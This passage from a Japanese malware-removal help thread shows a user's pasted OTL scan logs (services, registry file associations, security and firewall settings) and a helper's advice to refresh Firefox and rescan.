SRV - [2014/10/29 10:01:27 | 000,046,592 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\keyiso.dll -- (KeyIso)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:28 | 000,516,608 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\es.dll -- (EventSystem)
SRV - [2014/10/29 09:55:10 | 000,367,616 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:50 | 000,135,168 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\browser.dll -- (Browser)
SRV:[b]64bit:[/b] - [2014/10/29 10:27:24 | 000,131,584 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:29 | 000,817,664 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:06 | 000,365,056 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)
SRV - [2014/10/29 10:05:58 | 000,292,864 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:41 | 000,252,416 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)
SRV:[b]64bit:[/b] - [2014/10/29 10:14:35 | 000,110,592 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\eapsvc.dll -- (Eaphost)
SRV:[b]64bit:[/b] - [2014/10/29 11:44:23 | 000,033,792 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)
SRV - [2014/10/29 10:59:46 | 000,030,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)
SRV:[b]64bit:[/b] - [2014/10/29 10:07:58 | 000,452,608 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)
SRV:[b]64bit:[/b] - [2014/10/29 10:08:58 | 000,397,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)
No service found with a name of MsMpSvc
No service found with a name of NisSrv
SRV:[b]64bit:[/b] - [2014/10/29 10:01:45 | 000,706,048 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\swprv.dll -- (swprv)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:44 | 000,071,168 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\mmcss.dll -- (MMCSS)
SRV:[b]64bit:[/b] - [2014/10/29 09:51:03 | 000,266,752 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netman.dll -- (Netman)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:20 | 000,550,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/12/06 10:41:58 | 000,391,680 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:16 | 000,028,672 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)
SRV:[b]64bit:[/b] - [2014/10/29 11:45:24 | 000,116,736 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)
SRV:[b]64bit:[/b] - [2014/10/29 09:54:15 | 000,827,392 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)
No service found with a name of ProtectedStorage
No service found with a name of EMDMgmt
SRV:[b]64bit:[/b] - [2014/10/29 11:34:42 | 000,102,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)
SRV:[b]64bit:[/b] - [2014/10/29 09:59:21 | 000,542,208 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:29 | 000,817,664 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:25 | 000,031,744 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)
SRV:[b]64bit:[/b] - [2014/10/29 12:51:48 | 000,047,024 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\lsass.exe -- (SamSs)
SRV:[b]64bit:[/b] - [2014/10/29 09:56:06 | 000,146,944 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:18:49 | 000,329,216 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)
SRV:[b]64bit:[/b] - [2014/10/29 10:04:06 | 000,640,000 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)
SRV - [2014/10/29 09:49:09 | 000,576,512 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)
No service found with a name of slsvc
SRV:[b]64bit:[/b] - [2014/10/29 09:52:52 | 001,265,152 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)
SRV:[b]64bit:[/b] - [2014/10/29 11:12:14 | 000,313,344 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)
SRV - [2014/10/29 10:34:59 | 000,254,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:29 | 000,059,392 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\themeservice.dll -- (Themes)
SRV:[b]64bit:[/b] - [2014/12/09 10:50:34 | 000,225,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:59:28 | 001,454,080 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)
SRV:[b]64bit:[/b] - [2014/10/29 10:02:48 | 000,911,360 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\audiosrv.dll -- (Audiosrv)
SRV:[b]64bit:[/b] - [2014/12/06 10:35:00 | 000,229,888 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
No service found with a name of SDRSVC
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,023,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:[b]64bit:[/b] - [2014/10/29 10:16:27 | 001,696,256 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (EventLog)
SRV:[b]64bit:[/b] - [2014/10/29 10:02:44 | 000,880,640 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:59:24 | 000,670,720 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:35:14 | 000,064,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\msiexec.exe -- (msiserver)
SRV - [2014/10/29 10:52:53 | 000,059,904 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysWow64\msiexec.exe -- (msiserver)
SRV:[b]64bit:[/b] - [2014/10/29 10:18:13 | 000,230,400 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)
SRV:[b]64bit:[/b] - [2015/03/14 09:22:58 | 003,678,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)
SRV:[b]64bit:[/b] - [2014/10/29 10:53:17 | 000,262,144 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)
SRV:[b]64bit:[/b] - [2014/10/29 10:03:56 | 001,547,264 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlansvc.dll -- (WlanSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:29 | 000,289,280 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)

[color=#A23BEC]< %SYSTEMDRIVE%\*.exe >[/color]
[2007/11/20 23:08:08 | 000,562,688 | ---- | M] (Microsoft Corporation) -- C:\install.exe
[2010/07/08 01:11:00 | 000,183,296 | R--- | M] (I-O DATA DEVICE,INC.) -- C:\IOOCI.EXE

[color=#E56717]========== Files - Unicode (All) ==========[/color]
(C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\傲游??器 3) -- C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\傲游浏览器 3

[color=#E56717]========== Alternate Data Streams ==========[/color]

@Alternate Data Stream - 118 bytes -> C:\ProgramData\Temp:373E1720

< End of report >
  • かなは
  • 2015/04/21 (Tue) 17:10:06
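Re: I'm having trouble with pop-ups and ads being forcibly displayed.
That is all of the logs I collected. When I took the OTL log, a text file called Extras.Txt was produced at the same time; if it is needed, I will post it as well.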
  • かなは
  • 2015/04/21 (Tue) 17:13:41
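Let's refresh Firefox
I have checked the logs, and an enormous number of infections can already be confirmed.
However, Extras.txt is actually more important than OTL.txt,
so please be sure to paste it in your reply.

There are also troublesome settings left in Firefox, so let's start by refreshing it.
Start Firefox and open the menu with the "三" (three horizontal lines) icon.
Click the "?" Help menu and open Troubleshooting Information.
Press the Refresh Firefox button to perform the refresh.
After that, scan with OTL again, then paste the Extras.txt that was output the first time and the newly output OTL.txt in your reply.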
  • IVNO
  • 2015/04/21 (Tue) 19:55:29
Re: I'm having trouble with pop-ups and ads being forcibly displayed.
Understood.
I'll post the Extras.txt log first.
OTL Extras logfile created on: 2015/04/21 1:47:20 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ryota\Desktop
64bit- An unknown product (Version = 6.3.9600) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17728)
Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

7.88 Gb Total Physical Memory | 6.58 Gb Available Physical Memory | 83.54% Memory free
9.13 Gb Paging File | 7.90 Gb Available in Paging File | 86.54% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 456.99 Gb Total Space | 35.25 Gb Free Space | 7.71% Space Free | Partition Type: NTFS

Computer Name: NAMETUKI | User Name: ryota | Logged in as Administrator.
Boot Mode: SafeMode | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Extra Registry (SafeList) ==========[/color]


[color=#E56717]========== File Associations ==========[/color]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.html[@ = htmlfile] -- C:\Program Files\Internet Explorer\IEXPLORE.EXE (Microsoft Corporation)
.url[@ = InternetShortcut] -- C:\WINDOWS\SysNative\rundll32.exe (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\WINDOWS\SysWow64\control.exe (Microsoft Corporation)
.html [@ = htmlfile] -- C:\Program Files\Internet Explorer\IEXPLORE.EXE (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found

[color=#E56717]========== Shell Spawning ==========[/color]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
htmlfile [print] -- "C:\WINDOWS\system32\rundll32.exe" "C:\WINDOWS\system32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\WINDOWS\system32\rundll32.exe" "C:\WINDOWS\system32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\OpenWith.exe "%1" (Microsoft Corporation)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\OpenWith.exe "%1" (Microsoft Corporation)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.

[color=#E56717]========== Security Center Settings ==========[/color]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 0

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = AC 1C AE C5 46 9F CE 01 [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Upgrade]
"UpgradeTime" = [binary data]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Upgrade]
"UpgradeTime" = Reg Error: Unknown registry data type -- File not found

[color=#E56717]========== Firewall Settings ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
"DoNotAllowExceptions" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
"DoNotAllowExceptions" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 0
"DoNotAllowExceptions" = 0

[color=#E56717]========== Authorized Applications List ==========[/color]


[color=#E56717]========== Vista Active Open Ports Exception List ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]

[color=#E56717]========== Vista Active Application Exception List ==========[/color]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{009099D3-EA5F-4753-922B-BBC861E62234}" = protocol=17 | dir=in | app=c:\program files (x86)\mozilla firefox\firefox.exe |
"{01503B34-1D0D-4851-AE1E-F6235AB60B6D}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\bin\steamwebhelper.exe |
"{0794E7E3-08AC-4E18-A08A-96D5910E1D96}" = protocol=17 | dir=in | app=c:\program files (x86)\maxthon3\bin\maxthon.exe |
"{07C938AA-F54B-468F-8A11-4C3CD7FE6D72}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\age2hd\launcher.exe |
"{08AAB086-AB6F-43DE-A154-803165802B85}" = dir=out | name=windows_ie_ac_001 |
"{0BB8AC33-4C3D-426C-8439-A58A243DDC61}" = protocol=17 | dir=in | app=c:\users\ryota\downloads\utorrent.exe |
"{0C4FFAB4-C30E-4DAE-8FC0-209BE23F0567}" = protocol=17 | dir=in | app=c:\program files (x86)\maxthon3\modules\mxminithunder\thundermini.exe |
"{0D33A481-D37D-400E-983F-C556CA957413}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steam.exe |
"{118CA08C-7527-4138-B10B-61CE7D7A7AB7}" = dir=out | name=@{microsoft.bingnews_1.2.0.135_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingnews/resources/news} |
"{14D799F3-5410-494D-8FD3-02501D10B9E6}" = dir=out | name=@{microsoft.reader_6.2.8516.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.reader/resources/shortdisplayname} |
"{1A906073-519D-4B77-8F4E-19CE44CA9EC5}" = protocol=6 | dir=in | app=c:\windows\system32\arfc\wrtc.exe |
"{210AA50F-D6BA-4A65-9C41-303E2E335D3F}" = dir=out | name=@{microsoft.bingfoodanddrink_3.0.4.313_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingfoodanddrink/resources/apptitlewithbranding} |
"{21E05156-F8E3-4500-9677-9BB6B6F22984}" = dir=out | name=@{microsoft.binghealthandfitness_3.0.4.309_x64__8wekyb3d8bbwe?ms-resource://microsoft.binghealthandfitness/resources/apptitle} |
"{22A77403-B354-46CE-8C90-8938EF20012C}" = dir=out | name=windows_ie_ac_001 |
"{2E0932F0-D12C-477D-B5E1-83DF03447ED8}" = dir=in | name=@{microsoft.windowsreadinglist_6.3.9654.20540_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowsreadinglist/resources/apppackagename} |
"{2F9CEED4-58E8-42D6-8102-B5D444F908B9}" = protocol=17 | dir=in | app=c:\program files (x86)\maxthon3\bin\mxup.exe |
"{325804B3-4C52-45BA-A270-2B1888F9B611}" = protocol=17 | dir=in | app=c:\nexon\talesweaver\inphasenxd.exe |
"{346C9C59-91EE-44C6-99A2-E663E8390F50}" = dir=out | name=@{microsoft.windowscommunicationsapps_17.0.1119.516_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowscommunicationsapps/resources/communicationspackagename} |
"{3CA7E038-2B5E-48C7-9FF0-05D045E607D4}" = dir=out | name=@{microsoft.zunemusic_2.6.672.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunemusic/resources/ids_manifest_music_app_name} |
"{3DD1F688-6FA9-4923-8337-7E1289BDAE8B}" = dir=out | name=@{microsoft.bingweather_3.0.4.298_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingweather/resources/brandedapptitle} |
"{3EE68DC6-786E-43D5-9C0F-E1A182DF1B62}" = dir=out | name=@{microsoft.bingtravel_3.0.4.309_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingtravel/resources/brandedapptitle} |
"{41ECA379-9074-4EE1-928B-46DF51AFEBB3}" = dir=in | name=onenote |
"{4282FE99-8560-4BC7-9576-5F3ED84E263F}" = dir=in | name=checkpoint.vpn |
"{44E6995E-9E85-4A20-86A7-8FF9C8F374E5}" = dir=in | name=check point vpn |
"{47F6BBF7-2074-4CC5-A3CF-85A61EE9FB7C}" = dir=in | name=juniper networks junos pulse |
"{48A40ABC-7AAD-4F73-8CCE-2FD72215616C}" = dir=out | name=@{microsoft.xboxlivegames_1.0.927.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.xboxlivegames/resources/34150} |
"{4A95F02E-910A-416E-8DF3-70DA09C188B0}" = dir=in | app=c:\gameon\archeage\bin32\patcher.exe |
"{4AECD572-300B-4486-A703-D5A7C94722B6}" = protocol=6 | dir=in | app=c:\users\ryota\appdata\roaming\xlgames\xlkcsdownload_jp\xlkcsdownload_jp.exe |
"{4BB56D50-0173-49B5-80AB-9C93C8B7F376}" = dir=out | name=@{microsoft.zunevideo_2.6.439.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunevideo/resources/ids_manifest_video_app_name} |
"{4D028C29-2A66-4D21-B069-C9B4F45C4F38}" = protocol=6 | dir=in | app=c:\x-legend\genshin\game.bin |
"{4F3DFDB5-0D90-4943-90B1-92B2A09E6B78}" = protocol=6 | dir=in | app=c:\programdata\nexonjp\ngm\ngm.exe |
"{548DCF8C-BFF2-4BA4-AA88-FBAF9AC8BCC6}" = dir=in | name=@{c:\windows\winstore\resources.pri?ms-resource://winstore/resources/displayname} |
"{560448D6-095C-4907-B046-AC7F710701A7}" = dir=in | name=sonicwall.mobileconnect |
"{5812DF6F-6B13-49D7-9A04-2DF6F2FC2505}" = dir=out | name=@{microsoft.bingtravel_1.2.0.145_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingtravel/resources/apptitle} |
"{58F515B0-A0AF-4B94-9C01-387DA208C55E}" = dir=in | name=@{microsoft.reader_6.2.8516.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.reader/resources/shortdisplayname} |
"{5F4632C0-D5B1-40C3-B0D9-E3A759C81B9E}" = dir=out | name=sonicwall.mobileconnect |
"{67610D71-5A2C-4315-B346-AA5BE03D5705}" = dir=out | name=skype |
"{67C713B4-BD9F-439A-861E-00790CEE951D}" = protocol=17 | dir=in | app=c:\program files (x86)\maxthon3\bin\maxthon.exe |
"{6D25CB15-AAC4-4EF2-BFEF-5A0CA80F6C13}" = dir=out | name=@{microsoft.bingmaps_2.1.3230.2048_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingmaps/resources/appdisplayname} |
"{6DD87F49-B93F-40E4-B6E8-8F998CB3BD57}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{6FE1A57A-8E2E-40D9-B61A-272EA4B8188C}" = protocol=17 | dir=in | app=c:\users\ryota\appdata\roaming\xlgames\xlkcsdownload_jp\xlkcsdownload_jp.exe |
"{76CE7216-802A-43BA-BB1C-225CB7CE7C05}" = protocol=6 | dir=in | app=c:\program files (x86)\maxthon3\bin\maxthon.exe |
"{79F84839-B842-454A-91A4-1C9E3176E337}" = dir=in | name=@{microsoft.windowscommunicationsapps_17.0.1119.516_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowscommunicationsapps/resources/communicationspackagename} |
"{7A9FEC2A-DDE1-4CE6-97EC-2F949B5526FE}" = dir=out | name=f5 vpn |
"{7DBB95E5-37D6-481E-8FF0-7783952AF05F}" = dir=out | name=@{microsoft.xboxlivegames_2.0.139.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.xboxlivegames/resources/34150} |
"{7E8F1B59-2239-4BBC-8755-6B3D95FD9DD6}" = dir=in | name=f5 vpn |
"{808F1451-4108-46FD-ADBB-F17324B5F0BD}" = dir=out | name=@{c:\windows\winstore\resources.pri?ms-resource://winstore/resources/displayname} |
"{8406D4F5-256C-43E5-A90C-0915D5C65380}" = dir=in | name=sonicwall mobile connect |
"{851380EB-0379-4378-BF16-F67C424904B1}" = dir=out | name=sonicwall mobile connect |
"{85FBE51D-AA48-4E64-893B-54C714543CA1}" = dir=out | name=@{microsoft.zunevideo_1.5.802.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunevideo/resources/ids_manifest_video_app_name} |
"{88FB3814-4513-4CBC-A873-B0565593EE8C}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\bin\steamwebhelper.exe |
"{8EBA722B-09CB-4FB2-A1BC-6CDEDCFD99BD}" = protocol=6 | dir=in | app=c:\program files (x86)\maxthon3\bin\maxthon.exe |
"{9503C259-12DD-4649-8CDA-6E4809E16AE9}" = protocol=17 | dir=in | app=c:\hangame\japanese\goldwing\game.exe |
"{9740BE23-0938-4BE8-BA8B-B19AEF8CCCD2}" = dir=out | name=@{microsoft.bingweather_1.2.0.135_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingweather/resources/apptitle} |
"{9C8F71E3-B323-4721-95F2-40A687DC9B15}" = dir=out | name=@{microsoft.bingfinance_3.0.4.298_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingfinance/resources/brandedapptitle} |
"{9CC63241-376E-4B47-9B74-7DCEEBD4C269}" = dir=out | name=@{microsoft.bingfinance_1.2.0.135_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingfinance/resources/apptitle} |
"{9E3D57FC-7C37-4424-9352-4831E97D029D}" = dir=out | name=@{c:\windows\winstore\resources.pri?ms-resource://winstore/resources/displayname} |
"{A3A01DAC-93C5-4C92-925C-2A0870197B4F}" = dir=out | name=@{microsoft.bingsports_1.2.0.135_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingsports/resources/bingsports} |
"{A57F4810-E33D-48B9-8CD6-F41DC29CE35A}" = dir=out | name=windows_ie_ac_001 |
"{A899EF9B-C249-42C9-980D-E60A6109B2C3}" = dir=out | name=@{microsoft.bingnews_3.0.4.268_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingnews/resources/brandedapptitle} |
"{AE2227F9-370C-4BB4-AB89-074B2699E94C}" = dir=out | name=@{microsoft.zunemusic_1.0.927.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.zunemusic/resources/33273} |
"{B1758FE6-CF15-4E73-876D-FFFA588AA083}" = protocol=6 | dir=in | app=c:\hanpurple\dnest\dragonnest.exe |
"{BC3CFB2F-5334-4003-B754-9F8BBD34068A}" = dir=out | name=@{microsoft.windowsreadinglist_6.3.9654.20540_x64__8wekyb3d8bbwe?ms-resource://microsoft.windowsreadinglist/resources/apppackagename} |
"{BF0B3553-784A-4EE0-A754-E2D38153E48E}" = dir=in | name=skype |
"{C8686564-1AED-42A5-A078-2A7D9FD17165}" = dir=out | name=@{microsoft.bingmaps_1.2.0.136_x64__8wekyb3d8bbwe?ms-resource://microsoft.bingmaps/resources/appdisplayname} |
